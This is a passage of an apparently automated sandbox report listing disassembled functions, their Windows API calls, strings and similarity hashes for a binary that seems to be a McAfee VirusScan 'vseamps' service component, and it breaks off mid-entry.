Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740

Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON

Download Yara Rule

APIs

#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003D84
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003DA3
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E19
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E25
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E66
SetWaitableTimer.KERNEL32 ref: 0000000140003EA6

Strings

doCleanup: enter, cAmpEntry %p, xrefs: 0000000140003D76
doCleanup: pid %d, removing cAmpEntry, index is %d, xrefs: 0000000140003E08
doCleanup: pid %d, marking the cAmpEntry pointer for deletion, xrefs: 0000000140003E58

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
API String ID: 2984211723-3002863673
Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710

Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 00000001400021D4
OpenProcess.KERNEL32 ref: 00000001400021F7
#4.VSELOG ref: 000000014000223A
WaitForMultipleObjects.KERNEL32 ref: 000000014000224F
CloseHandle.KERNEL32 ref: 000000014000225A
#4.VSELOG ref: 0000000140002294

Strings

doMonitor: end process id=%d, result from WaitForMultipleObjects=%d, xrefs: 0000000140002283
doMonitor: monitoring process id=%d, xrefs: 000000014000222C
fnMonitor: monitor thread for ctx %p, xrefs: 00000001400021C6

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CloseHandleMultipleObjectsOpenProcessWait
String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
API String ID: 678758403-4129911376
Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710

Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140001797
GetProcessHeap.KERNEL32 ref: 00000001400017A6
HeapAlloc.KERNEL32 ref: 00000001400017B4
lstrlenW.KERNEL32 ref: 00000001400017EC
GetProcessHeap.KERNEL32 ref: 00000001400017FB
HeapAlloc.KERNEL32 ref: 0000000140001809
lstrlenW.KERNEL32 ref: 000000014000183F
GetProcessHeap.KERNEL32 ref: 000000014000184E
HeapAlloc.KERNEL32 ref: 000000014000185C
lstrlenW.KERNEL32 ref: 000000014000188D
GetProcessHeap.KERNEL32 ref: 000000014000189C
HeapAlloc.KERNEL32 ref: 00000001400018AA

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID:
API String ID: 3424473247-0
Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700

Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140011270: RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

__GetUnwindTryBlock.LIBCMT ref: 0000000140012CDD
__SetUnwindTryBlock.LIBCMT ref: 0000000140012D05
__GetUnwindTryBlock.LIBCMT ref: 0000000140012D15
_SetThrowImageBase.LIBCMT ref: 0000000140012DA6

Strings

csm, xrefs: 0000000140012E97
csm, xrefs: 0000000140012DC1
bad exception, xrefs: 0000000140012E4A
csm, xrefs: 0000000140012D2F

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
String ID: bad exception$csm$csm$csm
API String ID: 3766904988-820278400
Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700

Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140004A0F
LeaveCriticalSection.KERNEL32 ref: 0000000140004A1D
WaitForMultipleObjects.KERNEL32 ref: 0000000140004A44
Sleep.KERNEL32 ref: 0000000140004A75
EnterCriticalSection.KERNEL32 ref: 0000000140004A7F
SetEvent.KERNEL32 ref: 0000000140004AC5
ResetEvent.KERNEL32 ref: 0000000140004ACF
LeaveCriticalSection.KERNEL32 ref: 0000000140004AD9
WaitForMultipleObjects.KERNEL32 ref: 0000000140004B0D

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
String ID:
API String ID: 2707001247-0
Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708

Function 00007FFE11EC4804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE11EC4861

Part of subcall function 00007FFE11EC6BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFE11EC6C07
Part of subcall function 00007FFE11EC6BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE11EC6C2C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE11EC4939
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE11EC4B87
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE11EC4C94

Strings

csm, xrefs: 00007FFE11EC487B
csm, xrefs: 00007FFE11EC495C
csm, xrefs: 00007FFE11EC48E2

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction ID: db4500e74479e8a59876fc14c2a17d0cc17a43230c56b4b1cb34eca221de291b
Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction Fuzzy Hash: 7DD17032A08B4286EB209BA6DC403AE77A8FB557A8F540175EE4D57B65CF3CF581C740

Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014000169E
HeapFree.KERNEL32 ref: 00000001400016B0
GetProcessHeap.KERNEL32 ref: 00000001400016C0
HeapFree.KERNEL32 ref: 00000001400016D2
GetProcessHeap.KERNEL32 ref: 00000001400016E2
HeapFree.KERNEL32 ref: 00000001400016F4
GetProcessHeap.KERNEL32 ref: 0000000140001704
HeapFree.KERNEL32 ref: 0000000140001716
GetProcessHeap.KERNEL32 ref: 0000000140001726
HeapFree.KERNEL32 ref: 0000000140001738

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601

Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014001371E
HeapFree.KERNEL32 ref: 0000000140013730
GetProcessHeap.KERNEL32 ref: 0000000140013740
HeapFree.KERNEL32 ref: 0000000140013752
GetProcessHeap.KERNEL32 ref: 0000000140013762
HeapFree.KERNEL32 ref: 0000000140013774
GetProcessHeap.KERNEL32 ref: 0000000140013784
HeapFree.KERNEL32 ref: 0000000140013796
GetProcessHeap.KERNEL32 ref: 00000001400137A6
HeapFree.KERNEL32 ref: 00000001400137B8

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601

Function 00007FFE11ECB86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FFE11ECB9E8
GetProcAddress.KERNEL32 ref: 00007FFE11ECB9F4

Strings

api-ms-, xrefs: 00007FFE11ECB932
ext-ms-, xrefs: 00007FFE11ECB945

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction ID: a525ee4ac65d9d29a23aec91eadcef388d4dd319967b5ac4456312910da937f4
Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction Fuzzy Hash: D541F022B19E0241EF128BA7AC106BB239ABF45BF0F895575DD0E877A4EE3CF4059300

Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 0000000140002A3C
RegQueryValueExW.ADVAPI32 ref: 0000000140002A76
RegCloseKey.ADVAPI32 ref: 0000000140002A96
EnterCriticalSection.KERNEL32 ref: 0000000140002AAB
LeaveCriticalSection.KERNEL32 ref: 0000000140002B31

Strings

SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002A0D
action, xrefs: 0000000140002A52

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 1119674940-1966266597
Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00

Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004BE7
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004BF6
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C04
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C3E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C4D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C5B
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C8E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C9D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004CAB

GetComputerNameW.KERNEL32 ref: 0000000140001991
lstrlenW.KERNEL32 ref: 000000014000199C
GetProcessHeap.KERNEL32 ref: 00000001400019AB
HeapAlloc.KERNEL32 ref: 00000001400019B9

Strings

ncalrpc, xrefs: 000000014000196D
ampIfEp, xrefs: 000000014000195E
Security=impersonation static true, xrefs: 0000000140001952

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen$ComputerName
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3702919091-996641649
Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00

Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700

Function 00007FFE11EC712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE11EC72EB,?,?,?,00007FFE11EC3EC0,?,?,?,?,00007FFE11EC3CFD), ref: 00007FFE11EC71B1
GetLastError.KERNEL32(?,?,?,00007FFE11EC72EB,?,?,?,00007FFE11EC3EC0,?,?,?,?,00007FFE11EC3CFD), ref: 00007FFE11EC71BF
LoadLibraryExW.KERNEL32(?,?,?,00007FFE11EC72EB,?,?,?,00007FFE11EC3EC0,?,?,?,?,00007FFE11EC3CFD), ref: 00007FFE11EC71E9
FreeLibrary.KERNEL32(?,?,?,00007FFE11EC72EB,?,?,?,00007FFE11EC3EC0,?,?,?,?,00007FFE11EC3CFD), ref: 00007FFE11EC7257
GetProcAddress.KERNEL32(?,?,?,00007FFE11EC72EB,?,?,?,00007FFE11EC3EC0,?,?,?,?,00007FFE11EC3CFD), ref: 00007FFE11EC7263

Strings

api-ms-, xrefs: 00007FFE11EC71D1

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction ID: 990072d20dfda41c663adf375cb0abd485694a32b9ac8e01adbdc2f669ba5405
Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction Fuzzy Hash: DE31C161E5AE4291EF559B93AC006BA62DDBF49B70F990674ED2D073A0EE3CF441C300

Function 00007FFE11EC9444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE11EC9453
FlsGetValue.KERNEL32 ref: 00007FFE11EC9468
FlsSetValue.KERNEL32 ref: 00007FFE11EC9489
FlsSetValue.KERNEL32 ref: 00007FFE11EC94B6
FlsSetValue.KERNEL32 ref: 00007FFE11EC94C7
FlsSetValue.KERNEL32 ref: 00007FFE11EC94D8
SetLastError.KERNEL32 ref: 00007FFE11EC94F3

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction ID: 9fa66917b411da1a7c8e764f19f2b7cf9adb4d820d2e6183f3f4d04725e2d209
Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction Fuzzy Hash: D2215E24A0CE4245FB55A3F75E9127BA18AAF447F0F9457B4E97E07AF6EE2CB4418200

Function 00007FFE11ED0100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFE11ED0131
GetLastError.KERNEL32 ref: 00007FFE11ED013D
CloseHandle.KERNEL32 ref: 00007FFE11ED0155
CreateFileW.KERNEL32 ref: 00007FFE11ED0180
WriteConsoleW.KERNEL32 ref: 00007FFE11ED019F

Strings

CONOUT$, xrefs: 00007FFE11ED0161

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction ID: 5f649401dce417e819aa129900f62c80a58ec56dcec28b84ba81d8c97874015f
Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction Fuzzy Hash: E7118E31A18E4286EB508B93EC4432A76A9FB88BF4F045274EA5D87BE4CF3CD9448744

Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
CreateEventW.KERNEL32 ref: 00000001400012C0

